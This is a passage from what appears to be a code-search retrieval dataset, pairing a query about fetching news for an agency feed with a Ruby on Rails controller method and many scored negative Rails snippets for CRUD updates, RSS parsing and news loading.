"def update\n @recipe.allergies.destroy_all\n params[:recipe][:allergy].each do |key,value|\n if value[\"name\"] == \"1\"\n allergy = Allergy.find(key)\n @recipe.allergies << allergy\n end\n end\n\n if params[:recipe][:concentrate] == '1' || params[:recipe][:recipe_category_id] == RecipeCategory.find_by(name: \"Concentrates\").id\n @recipe.concentrate = true\n else\n @recipe.concentrate = false\n end\n\n respond_to do |format|\n if @recipe.update(recipe_params)\n @allergies = Allergy.all\n format.html { redirect_to @recipe, notice: 'Recipe was successfully updated.' }\n format.json { render :show, status: :ok, location: @recipe }\n else\n @allergies = Allergy.all\n format.html { render :edit }\n format.json { render json: @recipe.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category_offer.update_attributes(params[:category_offer])\n format.html { redirect_to @category_offer, notice: 'Category offer was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @category_offer.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @patch_name = args[:patch_name] if args.key?(:patch_name)\n @severity = args[:severity] if args.key?(:severity)\n @summary = args[:summary] if args.key?(:summary)\n end",
"def update!(**args)\n @ad_breaks = args[:ad_breaks] if args.key?(:ad_breaks)\n @ads_on_embeds = args[:ads_on_embeds] if args.key?(:ads_on_embeds)\n @countries_restriction = args[:countries_restriction] if args.key?(:countries_restriction)\n @id = args[:id] if args.key?(:id)\n @kind = args[:kind] if args.key?(:kind)\n end",
"def update\n respond_to do |format|\n if @vendor_category.update(vendor_category_params)\n format.html { redirect_to @vendor_category, notice: 'Vendor category was successfully updated.' }\n format.json { render :show, status: :ok, location: @vendor_category }\n else\n format.html { render :edit }\n format.json { render json: @vendor_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @news_agency = NewsAgency.find(params[:id])\n\n respond_to do |format|\n if @news_agency.update_attributes(params[:news_agency])\n format.html { redirect_to @news_agency, notice: 'News agency was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @news_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @aspect_cluster_ids = args[:aspect_cluster_ids] if args.key?(:aspect_cluster_ids)\n @brand_entity_id = args[:brand_entity_id] if args.key?(:brand_entity_id)\n @bx_category_ids = args[:bx_category_ids] if args.key?(:bx_category_ids)\n @measures = args[:measures] if args.key?(:measures)\n @merchant_ids = args[:merchant_ids] if args.key?(:merchant_ids)\n @merchant_source_ids = args[:merchant_source_ids] if args.key?(:merchant_source_ids)\n @tag_ids = args[:tag_ids] if args.key?(:tag_ids)\n end",
"def update\n respond_to do |format|\n if @suggested_category.update(suggested_category_params)\n format.html { redirect_to @suggested_category, notice: 'Suggested category was successfully updated.' }\n format.json { render :show, status: :ok, location: @suggested_category }\n else\n format.html { render :edit }\n format.json { render json: @suggested_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @price_list_item_id = args[:price_list_item_id] if args.key?(:price_list_item_id)\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @price_list_item_id = args[:price_list_item_id] if args.key?(:price_list_item_id)\n end",
"def update!(**args)\n @category_id = args[:category_id] if args.key?(:category_id)\n @cluster_ids = args[:cluster_ids] if args.key?(:cluster_ids)\n @detection_score = args[:detection_score] if args.key?(:detection_score)\n @embedding = args[:embedding] if args.key?(:embedding)\n @entities = args[:entities] if args.key?(:entities)\n @feature_type = args[:feature_type] if args.key?(:feature_type)\n @product_location = args[:product_location] if args.key?(:product_location)\n @token_groups = args[:token_groups] if args.key?(:token_groups)\n end",
"def update\n updated_activity = params.require(:activity).permit(:title, :body,\n tags_attributes:\n [:category_id])\n activity = Activity.find(params[:id])\n # first, clear any of the current activity's categories, then save\n Tag.where(activity_id: activity.id).destroy_all\n activity.update_attributes(updated_activity)\n\n respond_to do |format|\n format.html { redirect_to activity }\n format.json { render json: @activity }\n end\n end",
"def update!(**args)\n @app_id = args[:app_id] if args.key?(:app_id)\n @attribution_model_settings = args[:attribution_model_settings] if args.key?(:attribution_model_settings)\n @category = args[:category] if args.key?(:category)\n @click_through_lookback_window_days = args[:click_through_lookback_window_days] if args.key?(:click_through_lookback_window_days)\n @creation_time = args[:creation_time] if args.key?(:creation_time)\n @floodlight_settings = args[:floodlight_settings] if args.key?(:floodlight_settings)\n @id = args[:id] if args.key?(:id)\n @include_in_client_account_conversions_metric = args[:include_in_client_account_conversions_metric] if args.key?(:include_in_client_account_conversions_metric)\n @include_in_conversions_metric = args[:include_in_conversions_metric] if args.key?(:include_in_conversions_metric)\n @name = args[:name] if args.key?(:name)\n @owner_customer = args[:owner_customer] if args.key?(:owner_customer)\n @primary_for_goal = args[:primary_for_goal] if args.key?(:primary_for_goal)\n @resource_name = args[:resource_name] if args.key?(:resource_name)\n @status = args[:status] if args.key?(:status)\n @type = args[:type] if args.key?(:type)\n @value_settings = args[:value_settings] if args.key?(:value_settings)\n end",
"def agendacategory_params\n params.require(:agendacategory).permit(:category)\n end",
"def update\n @admin_agency = Admin::Agency.find(params[:id])\n\n respond_to do |format|\n if @admin_agency.update_attributes(params[:admin_agency])\n format.html { redirect_to @admin_agency, notice: 'Agency was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @admin_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @channel_category = ChannelCategory.find(params[:id])\n\n respond_to do |format|\n if @channel_category.update_attributes(params[:channel_category])\n format.html { redirect_to marketing_channel_category_path(@channel_category), notice: 'Channel category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @channel_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @api_v1_group_category.update(api_v1_group_category_params)\n format.html { redirect_to @api_v1_group_category, notice: 'Group category was successfully updated.' }\n format.json { render :show, status: :ok, location: @api_v1_group_category }\n else\n format.html { render :edit }\n format.json { render json: @api_v1_group_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @aspcategory.update(aspcategory_params)\n format.html { redirect_to @aspcategory, notice: 'Aspcategory was successfully updated.' }\n format.json { render :show, status: :ok, location: @aspcategory }\n else\n format.html { render :edit }\n format.json { render json: @aspcategory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to edit_dashboard_category_path(@category), notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @gtfs_agency = GtfsAgency.find(params[:id])\n\n respond_to do |format|\n if @gtfs_agency.update_attributes(params[:gtfs_agency])\n format.html { redirect_to(@gtfs_agency, :notice => 'Gtfs agency was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @gtfs_agency.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @description = args[:description] if args.key?(:description)\n @description_score = args[:description_score] if args.key?(:description_score)\n @identifier = args[:identifier] if args.key?(:identifier)\n @language = args[:language] if args.key?(:language)\n @title = args[:title] if args.key?(:title)\n @title_score = args[:title_score] if args.key?(:title_score)\n @url = args[:url] if args.key?(:url)\n end",
"def update\n respond_to do |format|\n if @activity_category.update(activity_category_params)\n format.html { redirect_to @activity_category, notice: 'Activity category was successfully updated.' }\n format.json { render :show, status: :ok, location: @activity_category }\n else\n format.html { render :edit }\n format.json { render json: @activity_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @agency.update_attributes(params[:agency])\n format.html { redirect_to @agency, notice: 'Agency was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @agency.update(agency_params)\n format.html { redirect_to @agency, notice: \"Agency was successfully updated.\" }\n format.json { render :show, status: :ok, location: @agency }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.65837145",
"0.64573747",
"0.6200794",
"0.6153669",
"0.61454356",
"0.60933644",
"0.6020954",
"0.6004011",
"0.5993255",
"0.5993255",
"0.59900177",
"0.5969397",
"0.59490365",
"0.5918142",
"0.5916518",
"0.59069264",
"0.59056515",
"0.5890757",
"0.5870441",
"0.5852912",
"0.584154",
"0.5839768",
"0.5837084",
"0.5821869",
"0.57992446",
"0.5778685",
"0.5766098",
"0.5754019",
"0.57430816",
"0.57398593",
"0.5735532",
"0.57210743",
"0.5716795",
"0.5707845",
"0.57028526",
"0.570151",
"0.57002527",
"0.5700005",
"0.5698908",
"0.56979334",
"0.56915724",
"0.56901616",
"0.56839263",
"0.5672558",
"0.5666147",
"0.566445",
"0.5658947",
"0.5629445",
"0.5613751",
"0.56102353",
"0.56102353",
"0.5607317",
"0.56004095",
"0.5599534",
"0.5594642",
"0.55893165",
"0.55891097",
"0.5575447",
"0.5573105",
"0.5570012",
"0.5563071",
"0.5554586",
"0.5546095",
"0.55357116",
"0.55319035",
"0.5528975",
"0.5527944",
"0.55095166",
"0.5506601",
"0.5500641",
"0.549958",
"0.5498739",
"0.5498549",
"0.54926527",
"0.54921997",
"0.5490094",
"0.548722",
"0.54858935",
"0.54799795",
"0.54692596",
"0.54628354",
"0.5458105",
"0.5456895",
"0.54532415",
"0.5449103",
"0.5449103",
"0.5441149",
"0.54390234",
"0.5437966",
"0.54346687",
"0.54336345",
"0.5433417",
"0.54332066",
"0.54315686",
"0.5420424",
"0.5417793",
"0.5416503",
"0.5415058",
"0.5413418",
"0.5412841"
] | 0.69128275 | 0 |
GET /agencyfeed/:id/fetch_news.json fetch all the news and update db for a specific agencyfeed. | def fetch_news
@news = News.fetch_and_store_news! @agencyfeed
render template: 'news/list', status: :ok
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def fetch\n ##\n # an array of { category_id: number, news: array }\n @fetched = News.fetch_and_store_news_from_all_agency_feed!\n render :fetch, status: :ok\n end",
"def fetch_data\n rss_provider = RssProvider.find(params[:format])\n unless rss_provider.rss_url.include?(\"indiatvnews\" ) || rss_provider.rss_url.include?(\"hindu\" ) || rss_provider.rss_url.include?(\"zee\" )\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n feeds = xml[\"rss\"][\"channel\"][\"item\"]\n feeds.each do |feed|\n if rss_provider.rss_url.include?(\"indiatoday\" )\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n\n\n index_of_summary = feed[\"description\"].index(\"</a>\")\n summary = feed[\"description\"][index_of_summary..].delete_prefix(\"</a> \")\n index_of_image = feed[\"description\"].index(\"src\")\n image_url = feed[\"description\"][(index_of_image+5)..(index_of_summary-4)]\n News.create(title: feed[\"title\"], summary: summary, \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: image_url,\n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n end\n\n \n elsif rss_provider.rss_url.include?(\"news18\")\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n index_of_image = feed[\"description\"].index(\"https\")\n summary_index = feed[\"description\"].index(\" />\")\n last_index_of_image = feed[\"description\"].index(\"jpg\")\n image_url = feed[\"description\"][(index_of_image)..(last_index_of_image)] + \"pg\"\n summary = feed[\"description\"][(summary_index+3)..]\n News.create(title: feed[\"title\"], summary: summary,published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: image_url, rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n\n elsif rss_provider.rss_url.include?(\"bbc\")\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n News.create(title: feed[\"title\"], summary: feed[\"description\"], \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: feed[\"fullimage\"], \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n\n elsif rss_provider.rss_url.include?(\"ndtv\")\n title = News.find_by(title: feed[\"title\"])\n unless title.present?\n News.create!(title: feed[\"title\"], summary: feed[\"description\"], \n published_on: feed[\"updatedAt\"], url: feed[\"link\"], media_url: feed[\"fullimage\"], \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id,provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n\n \n elsif rss_provider.rss_url.include?(\"timesofindia\")\n title = News.find_by(title: feed[\"title\"])\n\n unless title.present?\n\n if rss_provider.category.category_name == \"Top Story\" \n News.create(title: feed[\"title\"], summary: feed[\"description\"], \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: \"\", \n rss_provider_id: rss_provider.id,category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime) \n else\n unless feed[\"description\"] == nil \n index_of_image = feed[\"description\"].index(\"src\")\n last_index_of_image = feed[\"description\"][index_of_image..].index(\"/>\")+index_of_image\n image_url = feed[\"description\"][(index_of_image+5)..(last_index_of_image-3)]\n summary_index = feed[\"description\"].index(\"</a>\")\n summary = feed[\"description\"][(summary_index+4)..]\n News.create(title: feed[\"title\"], summary: summary, \n published_on: feed[\"pubDate\"], url: feed[\"link\"], media_url: image_url, \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n end\n end\n \n\n end\n\n end\n end\n\n unless rss_provider.rss_url.include?(\"timesofindia\" ) || rss_provider.rss_url.include?(\"ndtv\" ) || rss_provider.rss_url.include?(\"bbc\" ) ||\n rss_provider.rss_url.include?(\"news18\") || rss_provider.rss_url.include?(\"indiatoday\") \n\n\n if rss_provider.rss_url.include?(\"indiatvnews\" )\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n index_of_summary = feed.summary.index(\"</a>\")\n summary = feed.summary[index_of_summary+4..]\n index_of_image = feed.summary.index(\"src\")\n image_url = feed.summary[(index_of_image+5)..(index_of_summary-5)]\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: summary, \n published_on: feed.published, url: feed.url, media_url: image_url, \n rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n elsif rss_provider.rss_url.include?(\"thehindu\")\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: feed.summary.strip, \n published_on: feed.published, url: feed.url,rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n elsif rss_provider.rss_url.include?(\"zee\")\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: feed.summary.strip, \n published_on: feed.published, url: feed.url,rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n end\n\n end\n\n unless rss_provider.rss_url.include?(\"timesofindia\" ) || rss_provider.rss_url.include?(\"ndtv\" ) || rss_provider.rss_url.include?(\"bbc\" ) ||\n rss_provider.rss_url.include?(\"news18\") || rss_provider.rss_url.include?(\"indiatoday\") ||\n rss_provider.rss_url.include?(\"indiatvnews\") || rss_provider.rss_url.include?(\"thehindu\") ||\n rss_provider.rss_url.include?(\"zee\")\n\n xml = HTTParty.get(rss_provider.rss_url)\n ProviderContent.create(xml: xml, rss_provider_id: rss_provider.id)\n xml = xml.body\n feeds = Feedjira.parse(xml)\n feeds.entries.each do |feed|\n title = News.find_by(title: feed.title)\n unless title.present?\n News.create(title: feed.title, summary: feed.summary.strip, \n published_on: feed.published, url: feed.url,rss_provider_id: rss_provider.id, category_id: rss_provider.category.id, \n provider_id: rss_provider.provider.id, media_credit: rss_provider.provider.provider_name)\n end\n\n end\n rss_provider.update(news_updated_at: Time.now.localtime)\n\n end\n redirect_to admin_rss_providers_path, alert: \"Fetched Successfully \"\n\n end",
"def news_feed\n begin\n client = Feedlr::Client.new(oauth_access_token: ENV['FEEDLY_OAUTH_ACCESS_TOKEN'])\n @latest_list = {}\n client.user_unread_counts.unreadcounts.each do |unread_articles|\n next if unread_articles['count'] == 0\n unread_article_items = client.stream_entries_contents(unread_articles.id, unreadOnly: true).items\n next if unread_article_items.empty?\n\n unread_article_items.each do |article|\n @latest_list[article.alternate[0].href] = \"◼︎ <a href='#{article.alternate[0].href}'>#{article.title} - #{article.origin.title}</a>\"\n end\n client.mark_article_as_read(unread_articles.id)\n end\n @latest_news = @latest_list.values.join(\"<br>\")\n rescue => evar\n fail evar\n end\n @latest_news\n end",
"def crawl\n update_all_feeds\n fetch_and_store_articles\n end",
"def set_news_feed\n @news_feed = NewsFeed.find(params[:id])\n end",
"def fetch!\n parsed_feed = FeedNormalizer::FeedNormalizer.parse open(self.feed_url)\n \n self.update_attributes( :title => parsed_feed.title,\n :url => parsed_feed.url\n #:etag => parsed_feed.etag\n #:last_modified => parsed_feed.last_modified\n )\n \n parsed_feed.entries.each do |entry|\n self.entries.create(:url => entry.url,\n :title => entry.title,\n :author => entry.author,\n #:summary => entry.summary,\n :content => entry.content\n #:published => entry.published\n #:categories => entry.categories\n ) if !Entry.find_by_url(entry.url)\n end\n end",
"def news_for_feed(feed_id)\n news = []\n\n where(:user_id => User.current_user_id, :feed_id => feed_id).each do |news_item|\n news.push news_item.attributes\n end\n\n news\n end",
"def set_newsfeed\n @newsfeed = Newsfeed.find(params[:id])\n end",
"def newsfeed\n check_auth :newsfeed\n \n response = connection.post do |req|\n req.url '/user/newsfeed'\n req.body = { :format => @format }\n end\n response\n end",
"def handle_news\n @feeder.send_feed(message.chat.id)\n end",
"def feed!\n http_fetch(feed_url)\n end",
"def get_new_articles\n # Download the RSS feed and save to self.doc\n get_source\n \n # Keep track of which articles are in the feed \n articles = []\n \n article_links = (self.doc/'li.mjItemMain').collect do |mjItem|\n mjItem.at('a.mjLinkItem')\n end\n \n # For each item in the RSS feed \n article_links.each_with_index do |link, index|\n \n # Create or update the article in the db\n articles << Article.factory(\n :category => self.category,\n :description => '',\n :feed => self,\n :url => \"http://online.wsj.com#{link.attributes['href']}\",\n :priority => index\n )\n end\n \n articles\n end",
"def set_news_latest\n @news_latest = NewsLatest.find(params[:id])\n end",
"def fetch_from_news_feed\n unless self.facebook_omniauth.blank?\n fb_user = self.facebook_client_user\n unless fb_user.blank?\n posts = fb_user.home # fetch posts\n Movie.name_is_not_blank.name_without_dictionary_word.this_year.each do |movie|\n posts.each do |post|\n FacebookFeed.create_facebook_post(post, movie, post.from)\n User.pull_comments(post, movie) #check for comments is present\n end # each post end\n end # movie end\n end\n end\n end",
"def set_official_news\n @official_news = OfficialNews.find(params[:id])\n end",
"def news\n do_scrape\n @posts = UbuEntry.all(:order => \"id DESC\", :limit => 400)\n render :layout => false, :content_type => Mime::RSS\n end",
"def index\n domain = 'www.hs-karlsruhe.de'\n site_master = '/fakultaeten/fk-iwi/masterstudiengaenge/fk-iwiim/aktuell.html' \n site_bachelor = '/fakultaeten/fk-iwi/bachelorstudiengaenge/fk-iwiib/aktuell.html' \n site_general = '/fakultaeten/fk-iwi/aktuelles.html'\n\n file_master = \"aktuell_master.html\"\n file_bachelor = \"aktuell_bachelor.html\"\n file_general = \"aktuell_general.html\"\n\n # If the data is too old, fetch new data\n Rails.logger.info(\"data is too old?\")\n Rails.logger.info(\"age: \" + (Time.now - @@lastFetch).to_s)\n @news = News.find(:all)\n\n if Time.now - @@lastFetch > 2.hour or @news.empty? then \n Rails.logger.info(\"fetching new data!\")\n # delete all stored news\n @news = Array.new\n News.delete_all\n @newsCount = 1\n\n\n\n downloadWebsite(domain, site_master, file_master)\n downloadWebsite(domain, site_bachelor, file_bachelor)\n downloadWebsite(domain, site_general, file_general)\n\n \n\n # Fetch Bachelor News\n parseForNews(file_master, \"IM\")\n parseForNews(file_bachelor, \"IB\")\n parseForNews(file_general, \"IWI\")\n\n @@lastFetch = Time.now\n end\n\n @updated_at = @@lastFetch\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @news }\n end\n end",
"def index\n @newsfeeds = Newsfeed.all\n end",
"def update\n @agencyfeed.update! agencyfeed_params\n render :show, status: :ok\n end",
"def fetch\n @feed = Feed.find(params[:id])\n @feed.fetch\n redirect_to :back, notice: 'Feed fetched OK'\n end",
"def set_news_update\n @news_update = NewsUpdate.find(params[:id])\n end",
"def index\n @response = HTTParty.get(\"http://newsapi.org/v2/top-headlines?category=sports&q=golf&apiKey=12e692d8e7254efa8cf6276ea99736b0\")\n @report = JSON.parse(@response.body)\n @article = @report[\"articles\"]\n end",
"def fetch\n puts \"Fetching feed: #{self.feed_url}\"\n Feedzirra::Feed.add_common_feed_entry_element('georss:point', :as => :point)\n Feedzirra::Feed.add_common_feed_entry_element('geo:lat', :as => :geo_lat)\n Feedzirra::Feed.add_common_feed_entry_element('geo:long', :as => :geo_long)\n Feedzirra::Feed.add_common_feed_element('generator', :as => :generator)\n\n feed = Feedzirra::Feed.fetch_and_parse(self.feed_url)\n\n self.update_attributes(\n :title => feed.title,\n :url => feed.url,\n :description => feed.description,\n :generator => feed.generator,\n :last_fetched => DateTime.now\n )\n\n feed.entries.each do |e|\n \n if e.geo_lat && e.geo_long\n latlon = [e.geo_lat, e.geo_long]\n elsif e.point\n latlon = e.point.split(' ')\n else\n next\n end\n \n attrs = {\n :title => e.title,\n :url => e.url,\n :author => e.author,\n :summary => e.summary,\n :content => e.content,\n :published => e.published,\n :guid => e.id,\n :lon => latlon[1].to_f,\n :lat => latlon[0].to_f\n }\n \n # Create a new post or update an existing one\n post = Post.find_or_initialize_by_url(e.url)\n post.feed = self\n post.assign_attributes(attrs)\n post.save\n end\n end",
"def index\n @news = Newsfeed.order(\"created_at DESC\")\n render json: { is_success: true, message: \"news fetch successful\", data: @news }, status: 200\n end",
"def set_article\n @feeds = Feed.find(params[:id])\n end",
"def show\n @news_update = NewsUpdate.find(params[:id])\n end",
"def set_news\n @news = New.where(:id => params[:id]).first\n end",
"def fetch_news(last_fetch = \"#{Date.today.to_s} 00:00:00\")\n x = build_news(parse_json(@filename), last_fetch)\n end",
"def read_news_item(url)\n where(:user_id => User.current_user_id, :url => url).update_all(:read => true)\n end",
"def feed\n @articles = Article.feed_list(current_user, params[:page])\n end",
"def article_feed\n \tArticle.all\n end",
"def fetch_articles\n response = $redis.get('news')\n if response.nil?\n base_uri = \"http://content.guardianapis.com/search?order-by=newest&type=article\"\n response = JSON.generate(HTTParty.get(base_uri + \"&api-key=\" + ENV['GUARDIAN_API_KEY'])[\"response\"][\"results\"])\n $redis.set(\"news\", response)\n $redis.expire(\"news\", 1.hours.to_i)\n end\n @response = JSON.load(response)\n end",
"def fetch_articles\n current_feed = get_rss_feed( self.url )\n current_feed.entries.each do |article|\n unless self.array_of_article_urls.include?(article.url)\n a = Article.new(title: article.title, url: article.url, clicks: 0)\n a.title ||= article.summary\n self.articles.push a \n end\n end\n\tend",
"def set_api_v1_news\n @api_v1_news = News.find(params[:id])\n end",
"def fetch_articles\n return unless any_new?\n (how_many? - 1).downto(0) do |index|\n next if added?(index)\n Article.create(title: feed.entries[index].title,\n description: description(index),\n published: feed.entries[index].published,\n link: feed.entries[index].url,\n site_id: id,\n readingtime: reading_time(index))\n end\n end",
"def set_article_news\n @article_news = ArticleNew.find(params[:id])\n end",
"def fetch_articles\n\t\trequire 'open-uri'\n\t\tnewest_article = Article.limit(1).order(\"date DESC\")\n\t\ttrigger = false\n\t\tarticles = Array.new\n\t\tcache_article = Article.new\n\n\t\tfile = open(URL)\n\t\tcontents = file.readlines\n\t\tcontents.each do |line|\n\t\t\tif trigger\n\t\t\t\t#Date\n\t\t\t\tif line =~ /[1-3]?[0-9]\\.1?[0-9]\\.201[0-9]{1}/\n\t\t\t\t\tcache_article.date = line.slice(/[1-3]?[0-9]\\.1?[0-9]\\.201[0-9]{1}/)\n\t\t\t\t\tif (newest_article[0] != nil && cache_article.date < newest_article[0].date)\n\t\t\t\t\t\treturn nil\n\t\t\t\t\tend\n\t\t\t\t#Title\n\t\t\t\telsif line =~ /<h2>.+<\\/h2>/\n\t\t\t\t\tline.slice!(\"<h2>\")\n\t\t\t\t\tline.slice!(\"<\\/h2>\")\n\t\t\t\t\tcache_article.title = replace_uml line.strip\n\t\t\t\t#Text\n\t\t\t\telsif line =~ /<p[^>]*>/\n\t\t\t\t\tcache_article.text = fetch_text cache_article.url\n\t\t\t\t\tcache_article.text = replace_uml cache_article.text\n\t\t\t\t\timage_url = fetch_image_url cache_article.url\n\t\t\t\t\tcache_article.news_image = URI.parse(image_url) \n\t\t\t\t\tarticle = Article.create(title: cache_article.title, url: cache_article.url, text: cache_article.text, date: cache_article.date, news_image: cache_article.news_image)\n\t\t\t\t\ttrigger = false\n\t\t\t\t#url\n\t\t\t\telsif line =~ /\\/de\\/newsdetail.+.html/\n\t\t\t\t\tcache_article.url = \"http://www.ehco.ch\" + line.slice(/\\/de\\/newsdetail.+.html/)\n\t\t\t\tend\n\t\t\telsif line.include? \"news-element newsarchiv\"\n\t\t\t\ttrigger = true\t\t\t\t\t\n\t\t\tend\n\t\tend\n\tend",
"def update\n @feed = current_user.feeds.find params[:id]\n current_user.refresh_feed @feed\n\n head :ok\n rescue => e\n handle_error e\n end",
"def set_news\n @news = New.find(params[:id])\n end",
"def update_rss(id, body)\n doc = Nokogiri::XML(body)\n doc.xpath('rss/channel/item').each do |i|\n title = i.xpath('title').text\n link = i.xpath('link').text\n st = @sql.prepare \"select exists(select 1 from article_lists where article_url=?)\"\n st.execute(link).each_with_index do |res, index|\n insert_article_list(res, id, title, link) if index == 0\n end\n end\n end",
"def set_news\n @news = New.find(params[:id])\n end",
"def index\n \n @news = News.all\n @latest_news = News.latest_news\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @news }\n end\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def index\n #pagination parameters\n page_size = params[:page_size] ? params[:page_size].to_i : Page_size\n page = params[:page] ? params[:page].to_i : 1\n offset = page_size*(page - 1)\n @news = News.limit(page_size).offset(offset).order('created_at desc').includes(:user, :comments)\n\n if @news.blank?\n render json: {status: \"FEED_EMPTY\", message: \"No news feeds\", data: {}}, status: :ok\n else\n news_data = []\n # format likes, comments and user for each news\n @news.each do |news|\n news_data << {news: news, comments: news.comments.count, likes: liked_user_id(news), user: news.user.username}\n end\n render json: {status: \"SUCCESS\", message: \"List of news feeds\", data: news_data}, status: :ok\n end\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news\n @news = News.find(params[:id])\n end",
"def set_news_hit\n @news_hit = NewsHit.find(params[:id])\n end",
"def refresh_all\n success_count = 0\n error_count = 0\n Topic.find_all_external.each do |topic|\n permalink = topic.permalink\n begin\n refresh_topic(topic)\n success_count += 1\n rescue\n log.error \"Error refreshing news for '#{permalink}': #{$!}\"\n error_count += 1\n end\n end #each\n if error_count > 0\n STDERR.puts \"*** #{error_count} errors occurred while refreshing \" +\n \"the news data.\"\n STDERR.puts \"See the intranet log for details.\"\n end #if\n log.info \"#{success_count} news topics were updated successfully.\"\n end",
"def set_api_v1_news_link\n @api_v1_news_link = Api::V1::NewsLink.find(params[:id])\n end",
"def get_news( category = \"home\" )\n url = \"https://api.nytimes.com/svc/topstories/v2/#{ category }.json\"\n options = { api_key: Rails.application.secrets.NY_TIMES_TOP_STORIES_KEY }\n\n response = HTTParty.get( url, :query => options )\n\n response\n end",
"def index\n @news_latests = NewsLatest.all\n end",
